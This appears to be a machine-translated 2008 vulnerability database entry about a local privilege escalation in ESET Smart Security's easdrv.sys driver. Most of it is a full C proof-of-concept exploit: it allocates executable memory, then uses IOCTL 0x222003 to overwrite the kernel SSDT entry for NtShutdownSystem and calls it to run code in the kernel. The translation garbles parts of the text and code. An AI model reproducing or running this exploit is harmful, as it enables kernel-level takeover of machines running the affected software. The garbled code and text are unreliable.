ESET Smart Security 'easdrv.sys'local privilege elevation vulnerability-vulnerability warning-the black bar safety net

2008-08-21T00:00:00
ID MYHACK58:62200820109
Type myhack58
Reporter 佚名
Modified 2008-08-21T00:00:00

Description

:::Determination Xiao network research positions::: Eset Software Smart Security 3.0.667 Description: BUGTRAQ ID: 3 0 7 1 9 CNCAN ID: CNCAN-2 0 0 8 0 8 1 9 0 3

ESET Smart Security is an integrated firewall, anti-virus software. ESET Smart Security 'easdrv.sys'drive there is an input checking issue, a local attacker could exploit the vulnerability within the core processes permission to execute arbitrary instructions. File: easdrv.sys . text:00012B92 loc_12B92: . text:00012B92 push [ebp+InputBuf] . text:00012B95 call ds:off_1A200[eax] . text:00012B9B mov ecx, [ebp+OutputBuffer] . text:00012B9E mov [ecx], eax ProbeForRead/Write does not check the input and output pointers when the input/output pointer to a kernel-mode memory(above 0x80000000)cause the blue screen. The above code by sending IoControlCode = 0x222003 to the device\\.\\ easdrv to touch.

< reference <http://www.orange-bat.com/adv/2008/adv.08.14.txt> > Test method: [www.sebug.net] The following procedures(methods)may carry offensive,for security research and teaching purposes. At your own risk! // // ESET SmartSecurity priv. escalation // // visit www.orange-bat.com for full advisory // // g_ // g_ # orange-bat # com

include <windows. h>

include <stdio. h>

include <ddk/ntifs. h>

void TextError(LPTSTR lpszFunction) { // Retrieve the system error message for the last-error code

LPVOID lpMsgBuf; LPVOID lpDisplayBuf; DWORD dw = GetLastError();

FormatMessage( FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, NULL, dw, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR) &lpMsgBuf, 0, NULL );

// Display the error message and exit the process

lpDisplayBuf = (LPVOID)LocalAlloc(LMEM_ZEROINIT, (lstrlen((LPCTSTR)lpMsgBuf)+lstrlen((LPCTSTR)lpszFunction)+4 0)*sizeof(TCHAR)); sprintf((LPTSTR)lpDisplayBuf, TEXT("%s failed with error %d: %s"), lpszFunction, dw, lpMsgBuf); //MessageBox(NULL, (LPCTSTR)lpDisplayBuf, TEXT("Error"), MB_OK);

printf(lpDisplayBuf);

LocalFree(lpMsgBuf); LocalFree(lpDisplayBuf); }

BOOL TestIOCTL(PCHAR DeviceName, DWORD Ioctl, DWORD InputBuffer, DWORD InputLen, DWORD OutputBuffer, DWORD OutputLen ) { HANDLE hDevice; // handle to the drive to be examined BOOL bResult; // results flag DWORD junk; // discard results IO_STATUS_BLOCK IoStatusBlock;

hDevice = CreateFile(DeviceName, 0, // no access to the drive FILE_SHARE_READ | // share mode FILE_SHARE_WRITE, NULL, // default security attributes OPEN_EXISTING, // disposition 0, // file attributes NULL); // do not copy file attributes

if (hDevice == INVALID_HANDLE_VALUE) // cannot open the drive { TextError("CreateFile"); return (FALSE); }

bResult = DeviceIoControl(hDevice, // device to be queried Ioctl, (PVOID)InputBuffer, InputLen, (PVOID)OutputBuffer, OutputLen, // output buffer &junk, // # bytes returned (LPOVERLAPPED)NULL); // synchronous I/O

if(! bResult){ TextError("DeviceIoControl"); }

CloseHandle(hDevice);

return TRUE; }

int AllocMem(DWORD lpBase){

PVOID lpvResult;

lpvResult = VirtualAlloc( (LPVOID) lpBase, // Next page to commit 0x1337, // Page size, in bytes MEM_COMMIT, // Allocate a committed page PAGE_EXECUTE_READWRITE); // Read/write access if (lpvResult == NULL ){ TextError("VirtualAlloc"); return 0; } else { printf("VirtualAlloc success\n"); }

return 1; }

int main(int argc, char *argv[]) { DWORD Ioctl, Input, ILen, Output, OLen; DWORD SSDT;

if(! AllocMem(0x80000)){ return 1; }

Input = 1 2 3 4 5 6 7 8; SSDT = 0x80501414; //8 0 5 0 1 4 1 4 8060786e nt! NtShutdownSystem

Output = 0; if(TestIOCTL("\\\\.\\ easdrv", 0x222003, &Input, 4, SSDT-1, 4)){ TestIOCTL("\\\\.\\ easdrv", 0x222003, &Input, 4, SSDT+2, 4);

printf("NtShutdownSystem now points to 0x80000 :)"); printf("Jump to hyperspace in 2 seconds.."); Sleep(2*1 0 0 0); NtShutdownSystem(0); } else{ printf("Failed to open device"); }

return 0; }